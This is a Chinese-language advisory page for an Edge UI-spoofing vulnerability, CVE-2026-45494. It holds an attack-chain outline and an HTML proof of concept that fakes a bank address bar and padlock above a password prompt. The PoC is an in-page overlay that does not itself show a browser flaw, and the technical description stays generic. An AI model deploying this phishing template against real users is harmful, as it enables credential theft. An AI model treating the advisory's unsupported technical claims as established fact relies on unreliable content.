CVE-2026-45494 Microsoft Edge欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-45494

漏洞类型

欺骗

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Microsoft Edge (Chromium-based)

漏洞概述

Microsoft Edge (Chromium-based) 浏览器中存在一处欺骗漏洞。攻击者可以利用此漏洞伪造浏览器界面元素或网页内容，诱导用户误信虚假信息。该漏洞CVSS v3.1评分为5.4，属于中危级别。利用此漏洞需要用户交互，但无需身份认证，成功利用可能对信息的机密性和完整性造成低程度影响。

技术细节

该漏洞源于Microsoft Edge（基于Chromium内核）在处理特定网页渲染和UI（用户界面）交互时的逻辑缺陷。攻击者可以通过精心构造恶意HTML页面，利用CSS样式覆盖、iframe嵌入或弹窗机制，在浏览器视口中伪造一个看似合法的地址栏、安全锁图标或身份提示框。由于CVSS向量为AV:N/AC:L/PR:N/UI:R，攻击者无需预先获取系统权限，只需诱导受害者访问恶意URL并进行交互（如点击页面或滚动）。当受害者查看页面时，伪造的UI层会遮蔽真实的浏览器状态，导致受害者误以为正在访问受信任的网站（如银行或登录页）。这种破坏系统完整性的行为（I:L）使得网络钓鱼攻击更具欺骗性，进而可能导致敏感凭据泄露（C:L），但该漏洞通常不会直接导致系统可用性受损（A:N）或远程代码执行。

攻击链分析

STEP 1

1. 准备阶段

攻击者构造包含恶意代码的HTML页面，该代码设计用于覆盖浏览器原生的UI元素（如地址栏），伪造可信网站的视觉效果。

STEP 2

2. 投递阶段

攻击者通过网络钓鱼邮件、即时通讯或社交媒体，将包含恶意链接的消息发送给目标用户。

STEP 3

3. 执行交互

目标用户点击链接并在Microsoft Edge浏览器中打开页面。由于漏洞特性，浏览器加载并渲染了伪造的UI界面。

STEP 4

4. 欺骗利用

用户看到伪造的地址栏和看似合法的页面内容，误以为处于安全环境，从而在页面中输入敏感信息（如账号密码）。

STEP 5

5. 数据窃取

用户输入的数据被后台脚本捕获并发送至攻击者控制的服务器，完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC Concept for UI Spoofing in Microsoft Edge (Chromium-based)
  This code demonstrates how to create a fake address bar overlay.
  Note: This is for educational purposes only.
-->
<html>
<head>
    <style>
        body { margin: 0; padding: 0; background-color: #fff; font-family: Arial, sans-serif; }
        /* Simulate the fake address bar */
        .fake-address-bar {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 30px;
            background-color: #f1f3f4;
            border-bottom: 1px solid #ccc;
            display: flex;
            align-items: center;
            padding: 0 10px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
            z-index: 9999;
        }
        .fake-url {
            background-color: #fff;
            border-radius: 15px;
            padding: 2px 15px;
            flex-grow: 1;
            margin-left: 10px;
            font-size: 12px;
            color: #202124;
            text-align: center;
        }
        .content {
            margin-top: 40px;
            padding: 20px;
            text-align: center;
        }
    </style>
</head>
<body>
    <!-- Fake UI Element -->
    <div class="fake-address-bar">
        <span style="color: #5f6368;">🔒</span>
        <div class="fake-url">https://www.trusted-bank.com/login</div>
    </div>

    <!-- Phishing Content -->
    <div class="content">
        <h1>Security Check Required</h1>
        <p>Please re-enter your password to continue.</p>
        <input type="password" placeholder="Password" style="padding: 10px; width: 200px;">
        <br><br>
        <button style="padding: 10px 20px;">Submit</button>
    </div>

    <script>
        // Logic to capture interaction could go here
        console.log('Spoofing PoC loaded');
    </script>
</body>
</html>

影响范围

Microsoft Edge (Chromium-based) (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

在未安装官方补丁之前，建议用户谨慎处理来自不可信来源的链接。可以通过手动检查浏览器地址栏URL的真实性（如尝试选中并复制地址栏文本）来识别简单的UI伪造攻击。企业网络管理员可部署邮件网关过滤已知的钓鱼链接，并加强对员工的安全培训。